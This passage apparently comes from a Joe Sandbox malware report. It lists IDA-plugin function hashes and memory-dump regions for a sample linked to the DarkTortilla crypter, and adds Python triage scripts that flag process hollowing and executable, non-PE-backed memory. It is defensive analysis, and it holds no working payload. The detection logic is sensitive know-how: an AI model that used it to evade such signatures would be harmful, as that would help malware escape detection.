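    msg = entry["args"][1]
    if msg == "?":
        return None
    code = int(msg, 16)
    return WM_NAMES.get(code, f"0x{code:04X}")


if __name__ == "__main__":
    found = parse_api_entries(SAMPLE_REPORT)
    for region, hit in find_hollowing_regions(found).items():
        print(f"{region:08X}: {hit['required']} + {hit['corroborating']} "
              f"(wow64 target: {hit['wow64_target']})")
    for e in found:
        if (name := decode_post_message(e)):
            print(f"PostMessage at {e['ref']:08X} sends {name}")
```

Grouping by dump region matters here: the same sample also calls VirtualProtect from 07470000 and DuplicateHandle from 05350000, and neither region trips the signature on its own, which is the behaviour you want when the injector stub and the unpacked payload live in different allocations.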
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q
                                • API String ID: 0-1259897404
                                • Opcode ID: 64c890073315d986384bd97739595bb1b30020b55de4af890b75d2303fe7d494
                                • Instruction ID: 9b4745da7b606b66fae73d586e9cc955eebd8b42adfa896327f57b5fc38610be
                                • Opcode Fuzzy Hash: 64c890073315d986384bd97739595bb1b30020b55de4af890b75d2303fe7d494
                                • Instruction Fuzzy Hash: 7661AE3A3141019FCB14DF3AD884A7A7BEAFF89604B05406AEA5ECB365DB31DC01CB60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: *
                                • API String ID: 0-163128923
                                • Opcode ID: 540b97b974eaf8afcd4af2e318cac6d4cfc3016d792e0924d0a8eda170b5ad3b
                                • Instruction ID: ab94804888954c2177f21ee6a71bc0a701936aab0ada5aedd0f626610866c783
                                • Opcode Fuzzy Hash: 540b97b974eaf8afcd4af2e318cac6d4cfc3016d792e0924d0a8eda170b5ad3b
                                • Instruction Fuzzy Hash: 0F61F0747042158FCB199F3AD49873ABAE6AFC8310F144869E642CB394EF34CD4ACB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q
                                • API String ID: 0-1259897404
                                • Opcode ID: 25d94a20666a69334c5e3359334bf34f3a5a9bf7c6c10f73816352c605e916df
                                • Instruction ID: 6b1fe1f22e9f3a4138e90243637a2b15462a0fe12101d45043593b43ea4219d1
                                • Opcode Fuzzy Hash: 25d94a20666a69334c5e3359334bf34f3a5a9bf7c6c10f73816352c605e916df
                                • Instruction Fuzzy Hash: D04146796002059FCB149F69D888BAA7BB5FF88310F110469FA068B3B1CB70DD41CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 40da80a8df6a51c5a6036a1b9897cbbad2557896478e2fa32a466e55b7454afc
                                • Instruction ID: 0774acb92994191e08b8a438ead7585329b810321c838ba4ce621a777ca31733
                                • Opcode Fuzzy Hash: 40da80a8df6a51c5a6036a1b9897cbbad2557896478e2fa32a466e55b7454afc
                                • Instruction Fuzzy Hash: BE41AE31304255DFCB169F69E858B7A3BA2EF88311B0944A9EA4ACB391CB34DD51CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8aq
                                • API String ID: 0-538729646
                                • Opcode ID: 2ea11a93d3261981cd279448a5dbf8eef1c176537164ab88f8fa24066e90604b
                                • Instruction ID: b7ae37fe4256bfbc4c98b2495277e25a370c4cf7fc16bda3e623d39ae593992e
                                • Opcode Fuzzy Hash: 2ea11a93d3261981cd279448a5dbf8eef1c176537164ab88f8fa24066e90604b
                                • Instruction Fuzzy Hash: 8211B232B102418FC705DB79C498D6ABBE2EF9D3443958599E20ACF275EB36DC42CB01
                                APIs
                                • CloseHandle.KERNELBASE(?), ref: 01251A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 5b234b27fdebcaeed5d2aaa1ecce3a3bd192ef15b4a18f1d29290d85f8858a12
                                • Instruction ID: d801ed47aea9d2184f9796ee3b91e8c831cb2637ed923aebca2580a33d354dfa
                                • Opcode Fuzzy Hash: 5b234b27fdebcaeed5d2aaa1ecce3a3bd192ef15b4a18f1d29290d85f8858a12
                                • Instruction Fuzzy Hash: CE1125B18002498FDB10DF9AC549BEEBBF4EB48320F10841AD958A7340D338A984CFA5
                                APIs
                                • CloseHandle.KERNELBASE(?), ref: 01251A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 6b9818be37e4f4cf29d054362c7b503aac8bf2b61ee06082c10c3cdc63da9ae6
                                • Instruction ID: a0c7444e163f6f62b33d4efecf85b56c2871c8e16aea62273a065027147a696e
                                • Opcode Fuzzy Hash: 6b9818be37e4f4cf29d054362c7b503aac8bf2b61ee06082c10c3cdc63da9ae6
                                • Instruction Fuzzy Hash: F21103B58002498FDB10DF9AC585BEEBBF4EB48320F10841AD958A7340D738A584CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 43^q
                                • API String ID: 0-2065357395
                                • Opcode ID: eab801e5633a8eac4013bd0d2c75f96565991e5ce2dd7bc5740780c107b2d321
                                • Instruction ID: dbcc8ddd9d3649fbbdbe38496ca959297bd5ce85caa4f54425ab4e455ac01209
                                • Opcode Fuzzy Hash: eab801e5633a8eac4013bd0d2c75f96565991e5ce2dd7bc5740780c107b2d321
                                • Instruction Fuzzy Hash: 29E022297043800FD3091A72A4A926E3F57EFC1221F0888ABE481CB384CC6988098780
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de97784ab54d525335d40531260e77d0d0b431052329c2874c71c47373e4d5ae
                                • Instruction ID: 003b1a88718e80bc73697e190497a5154d93b12c633140e93011ed89b5e53cb5
                                • Opcode Fuzzy Hash: de97784ab54d525335d40531260e77d0d0b431052329c2874c71c47373e4d5ae
                                • Instruction Fuzzy Hash: 46026C70A28205CFCB04AF78EA9929DBBF2FF88304F544469E84AE7745EE385C45CB51
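The entries above are raw output of the Joe Sandbox IDA plugin, one block per recovered function, and the useful triage signal is buried in the "Source File" line: every function here was lifted from a memory dump that is not backed by a PE image (based on PE: false), at base addresses 0x01250000, 0x02CD0000 and 0x08250000. The following parser is an added example, not code from the report or from Joe Sandbox: it reads entries in exactly this shape, groups them by dump region, collects the API references and string IDs per region, and flags regions that are executable, writable and not PE-backed, which is where a crypter such as DarkTortilla leaves its unpacked payload. One assumption that the report does not document: the fifth dot-separated field of the .sdmp file name (00000040 here) is treated as the Win32 page protection of the dumped region, so 0x40 reads as PAGE_EXECUTE_READWRITE. The base-address field is cross-checked against the Offset printed on the same line, which the report does state. The sample input is constructed from four entries of this listing, with the Snapshot File, Instruction ID and Opcode Fuzzy Hash fields left out for brevity (the parser accepts them too).

```python
"""Group Joe Sandbox IDA-plugin function entries by memory-dump region.

Assumption (the report does not document its file naming): in the .sdmp name
'<proc>.<phase>.<id>.<base>.<protect>.<a>.<b>.<c>.sdmp' the fifth field is the
Win32 page protection of the dumped region, so 0x40 = PAGE_EXECUTE_READWRITE.
The base field is cross-checked against the 'Offset:' printed on the same line.
"""
import re

PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
KEYS = {"Source File", "Snapshot File", "API ID", "String ID", "API String ID",
        "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SDMP_RE = re.compile(r"\d{8}\.\d{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
                     r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp")
SOURCE_RE = re.compile(r"(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
API_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\(")  # "CloseHandle.KERNELBASE(?), ref: ..."

# Constructed sample: four entries copied from the listing above, with the Snapshot
# File, Instruction ID and Opcode Fuzzy Hash fields (also accepted below) left out.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
• API ID:
• String ID: Haq
• Opcode ID: 40da80a8df6a51c5a6036a1b9897cbbad2557896478e2fa32a466e55b7454afc
• Instruction Fuzzy Hash: BE41AE31304255DFCB169F69E858B7A3BA2EF88311B0944A9EA4ACB391CB34DD51CB91
APIs
• CloseHandle.KERNELBASE(?), ref: 01251A98
Memory Dump Source
• Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
• API ID: CloseHandle
• String ID:
• Opcode ID: 5b234b27fdebcaeed5d2aaa1ecce3a3bd192ef15b4a18f1d29290d85f8858a12
• Instruction Fuzzy Hash: CE1125B18002498FDB10DF9AC549BEEBBF4EB48320F10841AD958A7340D338A984CFA5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
• API ID:
• String ID: 43^q
• Opcode ID: eab801e5633a8eac4013bd0d2c75f96565991e5ce2dd7bc5740780c107b2d321
• Instruction Fuzzy Hash: 29E022297043800FD3091A72A4A926E3F57EFC1221F0888ABE481CB384CC6988098780
Memory Dump Source
• Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
• API ID:
• String ID:
• Opcode ID: de97784ab54d525335d40531260e77d0d0b431052329c2874c71c47373e4d5ae
• Instruction Fuzzy Hash: 46026C70A28205CFCB04AF78EA9929DBBF2FF88304F544469E84AE7745EE385C45CB51
"""


def parse_entries(text):
    """One dict per function entry; 'Instruction Fuzzy Hash' is always the last field."""
    entries, cur, section = [], {"apis": []}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line.startswith("• "):
            body = line[2:]
            api = API_RE.match(body) if section == "APIs" else None
            if api:                                   # API reference line under "APIs"
                cur["apis"].append(f"{api['mod']}!{api['api']}")
                continue
            key, _, value = body.partition(":")
            key = key.strip()
            if key in KEYS:
                cur[key] = value.strip()
            if key == "Instruction Fuzzy Hash":      # entry complete, start the next one
                entries.append(cur)
                cur, section = {"apis": []}, None
    return entries


def describe_source(value):
    """Decode '<sdmp>, Offset: <hex>, based on PE: <bool>' into a region description."""
    m = SOURCE_RE.match(value)
    f = SDMP_RE.fullmatch(m["name"]) if m else None
    if not f:
        raise ValueError(f"unrecognised source field: {value!r}")
    base = int(f["base"], 16)
    if base != int(m["off"], 16):                    # name and printed Offset must agree
        raise ValueError(f"base {base:#x} disagrees with Offset {m['off']}")
    protect = int(f["protect"], 16)                  # assumed field meaning, see docstring
    return {"base": base, "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "backed_by_pe": m["pe"].lower() == "true"}


def triage(text):
    """Group parsed entries by dump region: {base: {protect, backed_by_pe, functions, apis, strings}}."""
    regions = {}
    for e in parse_entries(text):
        info = describe_source(e["Source File"])
        r = regions.setdefault(info["base"], {**info, "functions": 0, "apis": set(), "strings": set()})
        r["functions"] += 1
        r["apis"].update(e["apis"])
        if e.get("String ID"):                       # empty "String ID:" fields are skipped
            r["strings"].add(e["String ID"])
    return regions


def suspicious_regions(regions):
    """Executable, writable regions not backed by a PE: where unpacked or injected code lives."""
    return sorted(b for b, r in regions.items()
                  if r["protect"] == "PAGE_EXECUTE_READWRITE" and not r["backed_by_pe"])


if __name__ == "__main__":
    for base, r in sorted(triage(SAMPLE).items()):
        print(f"{base:#010x} {r['protect']:<22} pe={r['backed_by_pe']} funcs={r['functions']} "
              f"apis={sorted(r['apis'])} strings={sorted(r['strings'])}")
```

Run against the full listing, the output gives a function count per dumped region and tells you which region carries real API references (here only 0x01250000, with its CloseHandle stub) and which carry only short junk strings such as "Haq" or "43^q", which is what partially decoded or encrypted data looks like when the plugin treats it as code. Note that the two CloseHandle entries in the listing have different Opcode IDs but near-identical instruction fuzzy hashes, so when comparing samples it is the fuzzy hash, not the exact ID, that is worth indexing.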
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 165d4762cf046612f4be03232adf1671f1b04c870d004c1738666cd87bee91b4
                                • Instruction ID: c43c7b8c2c6bb2055a64695fae73463f1ce629ccdf877e88a4b8fc279138a4ed
                                • Opcode Fuzzy Hash: 165d4762cf046612f4be03232adf1671f1b04c870d004c1738666cd87bee91b4
                                • Instruction Fuzzy Hash: A9E1F3716183118FC305BB78E89821D7BF2EF86314F85897DD489DB395DA389C4ACB92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0cb04c35830a7d06b3502d0aa4a7d0a04643e452cd5145a20be33900712d16df
                                • Instruction ID: 49fbafc8c52043d88c4b2758f7e551c7423ca4c204ebb37fdd70388f29d1608c
                                • Opcode Fuzzy Hash: 0cb04c35830a7d06b3502d0aa4a7d0a04643e452cd5145a20be33900712d16df
                                • Instruction Fuzzy Hash: 68E17071A24215CFC704FFB8E89966D7BB2EB85304F814979D449E7344DE389C8AC792
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f43eadece9b84c3d8c0f4636c83880a88bd0837a63ea198ebeeabf4863b0ddc
                                • Instruction ID: c75bba12af9d4eb59a77d579a9194ba7611521b4d954f224dcce0f24b72f39ff
                                • Opcode Fuzzy Hash: 7f43eadece9b84c3d8c0f4636c83880a88bd0837a63ea198ebeeabf4863b0ddc
                                • Instruction Fuzzy Hash: DED12774A24204CFCB14EFB8EA9929CBBF2FF88304F544569E80AE7745EE785C458B51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c341e1432127f51b4002abb81c46625e2dfbf7d2204dfca525e421d8f4ced518
                                • Instruction ID: c8685ae8d460e100151c91703a3033289c40a511e213110fd06ccaf7a4c37de9
                                • Opcode Fuzzy Hash: c341e1432127f51b4002abb81c46625e2dfbf7d2204dfca525e421d8f4ced518
                                • Instruction Fuzzy Hash: 13B19071A246168FD704FBB8D98466E77B6EB88318F904928D40DF3344EE789C5687A2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfcf92ed102bd396fef44f361243157043ae5bf069eba31a24b76333576ff1c0
                                • Instruction ID: 02b7dcca3e66b4bc28f8629e5d1ddaa09346df91e76c066a3ab416267e9b13d9
                                • Opcode Fuzzy Hash: cfcf92ed102bd396fef44f361243157043ae5bf069eba31a24b76333576ff1c0
                                • Instruction Fuzzy Hash: 66B19171A20215CFC745BFB8E89966D7BB2EB85304F814879D449E7344DE389C8AC792
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11f21695a60b932e3da2a867506a577ac39a2a13e0f3174d7933e9cf71251e8c
                                • Instruction ID: fffe95719343c254aef815d66b514a96850fb3b7ab347a2f6129766378faa937
                                • Opcode Fuzzy Hash: 11f21695a60b932e3da2a867506a577ac39a2a13e0f3174d7933e9cf71251e8c
                                • Instruction Fuzzy Hash: 6FD10776A00614DFCB04CF69D588AADBBF6FF88364F1A8469E505AB361CB35EC41CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63128d0c2d7b8d73fc08746f64aa70cc19d773bb7fe6016d4a96c6c68985d351
                                • Instruction ID: 932c03acdd479874bcd8139c3ed4d82515d897fd32b5335fa52261a709b153cd
                                • Opcode Fuzzy Hash: 63128d0c2d7b8d73fc08746f64aa70cc19d773bb7fe6016d4a96c6c68985d351
                                • Instruction Fuzzy Hash: E6B18F71A242128FC745FFB8E89966D7BB2EB85304F814879D449E7344DE389C8AC792
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15c337546ae28c70da1cbe11980f364331e51e5a16d05df876045c93c4c0efff
                                • Instruction ID: e2b9a66463ce3662129df8981537ce894dd6dd70ac5804756128faa30c45ae84
                                • Opcode Fuzzy Hash: 15c337546ae28c70da1cbe11980f364331e51e5a16d05df876045c93c4c0efff
                                • Instruction Fuzzy Hash: 27D11871A00618DFCB04CFA9D988AADBBF2FF88324F168559E515AB3A1C735ED41CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d96582b0daa43afe4cf8bc87eb12a5d68e31bb5769364272c32f13df67886fc0
                                • Instruction ID: d87e206c19e9d343155d9e16e03a19020deb9033438870fefde70aaa6012116f
                                • Opcode Fuzzy Hash: d96582b0daa43afe4cf8bc87eb12a5d68e31bb5769364272c32f13df67886fc0
                                • Instruction Fuzzy Hash: 38714C347006058FCB15DF29C484A7E7BE5AF89304F1901AAEA06DB3B1EB71EE41DB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ae99840553f3b8e6891cf12b2b16672df4b4ab9fa148a70a25392d7018417dc
                                • Instruction ID: 74a5988c0b10a9914ac21a5e0ba1f5d5dccb9844d6658acd79dfee1b9a9a747a
                                • Opcode Fuzzy Hash: 2ae99840553f3b8e6891cf12b2b16672df4b4ab9fa148a70a25392d7018417dc
                                • Instruction Fuzzy Hash: 9CD0C93006E2848FC34967B5B80E8663F2CAA01B01F0100A7F5869D872AE214800C712
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 36dd03a9373b3ee2be99e4522c57d1e84ac5ac1b7dd0725944899ec9bb6b8acb
                                • Instruction ID: 4933110e46ad6918fa8d2da48c7ad1361b415de87972e7415eb02b08dfad43f2
                                • Opcode Fuzzy Hash: 36dd03a9373b3ee2be99e4522c57d1e84ac5ac1b7dd0725944899ec9bb6b8acb
                                • Instruction Fuzzy Hash: 25B0923003E108CBC3083BB6F80E8283F2CBA00B02F400021F14B98C208E209810DA62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67d6344143b512dd03ff8392d33efff794e9a855e25655730a1070ad2ac20a1f
                                • Instruction ID: 385a29738f310235391c556b46482c852dbf185c12c23def883fcbd3ec991897
                                • Opcode Fuzzy Hash: 67d6344143b512dd03ff8392d33efff794e9a855e25655730a1070ad2ac20a1f
                                • Instruction Fuzzy Hash: DA518A79551605CFCB24CF58C584A9ABBF1FF58326F24C61AE86A9B7A0C330E845CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5eee141f4a2675f303519230d458a0da06e2a45d6ced349f0df28aba58464882
                                • Instruction ID: fe7483109fd78fbec155b4c1979f2bb3cc0a14f2dd011804e5ec77c93248cbe0
                                • Opcode Fuzzy Hash: 5eee141f4a2675f303519230d458a0da06e2a45d6ced349f0df28aba58464882
                                • Instruction Fuzzy Hash: DC517031A107099FCB14DF69D8446EDFBB2FF88311F14C66DE8096B264EB70A995CB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb564dc032b1867ef96d8ccc7a49f006731e3dbb42e1bcb4c9c65ba9ef49a37d
                                • Instruction ID: 22da99dd7d5ced695385e3b2dd889897f8e961662a343d754cc9c5f549b2e24a
                                • Opcode Fuzzy Hash: eb564dc032b1867ef96d8ccc7a49f006731e3dbb42e1bcb4c9c65ba9ef49a37d
                                • Instruction Fuzzy Hash: DD417F32E00249DFCF19CFA4C844B9EBFB2AF89354F008155EA16AB2A5D771F955CB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1b8e6c9cb3d91a8b5953725dc5ef4cbd6d4faf6bd82baddf2bbd669537bebd3
                                • Instruction ID: 766a3c8f31621d4b8bfc114386438242d9031b54ebf1008100627462100e0851
                                • Opcode Fuzzy Hash: e1b8e6c9cb3d91a8b5953725dc5ef4cbd6d4faf6bd82baddf2bbd669537bebd3
                                • Instruction Fuzzy Hash: E141DF31A002089FCB15DF64D854BAEBBF6FF84304F04896AEA5587251CB75EA46CFA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f8a4098738a1025adafb75381a17eb2079eda3b61e1f210fe93664cd45e0fc3
                                • Instruction ID: 94ef77668e69a41a05305beba4e7d40595fc44db09f8bcb262d2c0f78fd1cd5a
                                • Opcode Fuzzy Hash: 5f8a4098738a1025adafb75381a17eb2079eda3b61e1f210fe93664cd45e0fc3
                                • Instruction Fuzzy Hash: 244135B1D203099FDB14DFA9D9486EEBBF5FF49311F108429D805A7350EB78A905CBA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7d2b00757459eefc9a01612c3605349f3799b548560acd42c2490c40d32418c
                                • Instruction ID: 44773550d1600f5ffed3c333bfd30ab4447b91564fff24da7a12dc408975e5b5
                                • Opcode Fuzzy Hash: c7d2b00757459eefc9a01612c3605349f3799b548560acd42c2490c40d32418c
                                • Instruction Fuzzy Hash: 5031237190E7859FC302AB74D8A83497FB1EF42210F8A45DFD089E7692DA3C4859C356
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 534c4e1c55dd16bf9fff8358f2f6e25b70beca7d26f7d15884c569c28d85c2a7
                                • Instruction ID: 4f69ae5a3afd7a7d4a9e5065cf84a3bd9ec1dbd0d051e48c912a48ee7fb8dcb7
                                • Opcode Fuzzy Hash: 534c4e1c55dd16bf9fff8358f2f6e25b70beca7d26f7d15884c569c28d85c2a7
                                • Instruction Fuzzy Hash: C6316B307102458FDB01CF69CC44B6ABBE6EF89300F548467EA18CB2AAE771DE41CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4185963962c37aac9824f4eb4de1910a652bad2fcc408f3e6751fca712a6c4ee
                                • Instruction ID: a8708c1e4ae7a0026c0dd5321485f7637d3f11a19c0383bce15842e1e319b74f
                                • Opcode Fuzzy Hash: 4185963962c37aac9824f4eb4de1910a652bad2fcc408f3e6751fca712a6c4ee
                                • Instruction Fuzzy Hash: AB3181316002599FCF059F69E894AAF3BA6FF88310F148059FA059B354CF75DD91DB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
